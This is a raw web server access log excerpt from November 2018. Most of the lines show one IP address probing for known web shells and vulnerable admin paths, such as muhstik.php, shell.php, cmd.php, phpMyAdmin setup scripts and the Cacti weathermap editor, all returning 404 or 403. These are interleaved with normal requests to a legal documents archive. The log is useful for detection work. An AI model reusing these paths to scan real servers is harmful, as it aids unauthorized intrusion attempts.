180.76.163.218 - - [10/Nov/2018:03:29:09 -0500] "GET /wp-config.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:10 -0500] "GET /muhstik.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:11 -0500] "GET /muhstik2.php HTTP/1.1" 404 1018
181.58.183.19 - - [10/Nov/2018:03:29:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3221.pdf HTTP/1.1" 200 546029
181.58.183.19 - - [10/Nov/2018:03:29:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
180.76.163.218 - - [10/Nov/2018:03:29:13 -0500] "GET /muhstik-dpr.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:14 -0500] "GET /lol.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:15 -0500] "GET /uploader.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:19 -0500] "GET /cmx.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:20 -0500] "GET /cmv.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:21 -0500] "GET /knal.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:22 -0500] "GET /cmd.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:23 -0500] "GET /shell.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:24 -0500] "GET /appserv.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:25 -0500] "GET /scripts/setup.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:26 -0500] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 1165
180.76.163.218 - - [10/Nov/2018:03:29:27 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 403 1165
180.76.163.218 - - [10/Nov/2018:03:29:28 -0500] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 403 1165
180.76.163.218 - - [10/Nov/2018:03:29:33 -0500] "GET /plugins/weathermap/editor.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:34 -0500] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:35 -0500] "POST /wuwu11.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:36 -0500] "POST /xw.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:49 -0500] "POST /wc.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:29:53 -0500] "POST /s.php HTTP/1.1" 404 1018
69.162.124.232 - - [10/Nov/2018:03:29:56 -0500] "HEAD / HTTP/1.1" 200 -
180.76.163.218 - - [10/Nov/2018:03:29:57 -0500] "POST /sheep.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:30:01 -0500] "POST /db.init.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:30:05 -0500] "POST /db__.init.php HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:30:09 -0500] "POST /m.php?pbid=open HTTP/1.1" 404 1018
180.76.163.218 - - [10/Nov/2018:03:30:13 -0500] "POST /db_desql.php HTTP/1.1" 404 1018
54.36.149.56 - - [10/Nov/2018:03:30:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%201901-1950/00001904.tif HTTP/1.1" 200 42494
180.76.163.218 - - [10/Nov/2018:03:30:21 -0500] "GET /index.php HTTP/1.1" 404 1018
202.51.191.234 - - [10/Nov/2018:03:30:28 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.109 - - [10/Nov/2018:03:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202015/2203.pdf HTTP/1.1" 200 616507
180.76.163.218 - - [10/Nov/2018:03:30:33 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 403 1165
186.113.10.19 - - [10/Nov/2018:03:30:45 -0500] "GET /galeria/nivo-slider/demo/images/GlobalBigDayWEB%20%281%29.jpg HTTP/1.1" 304 -
180.76.163.218 - - [10/Nov/2018:03:31:05 -0500] "GET /pma/index.php HTTP/1.1" 404 1018
54.36.149.87 - - [10/Nov/2018:03:31:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%20901-950/00000937.tif HTTP/1.1" 200 429638
189.187.49.122 - - [10/Nov/2018:03:31:44 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
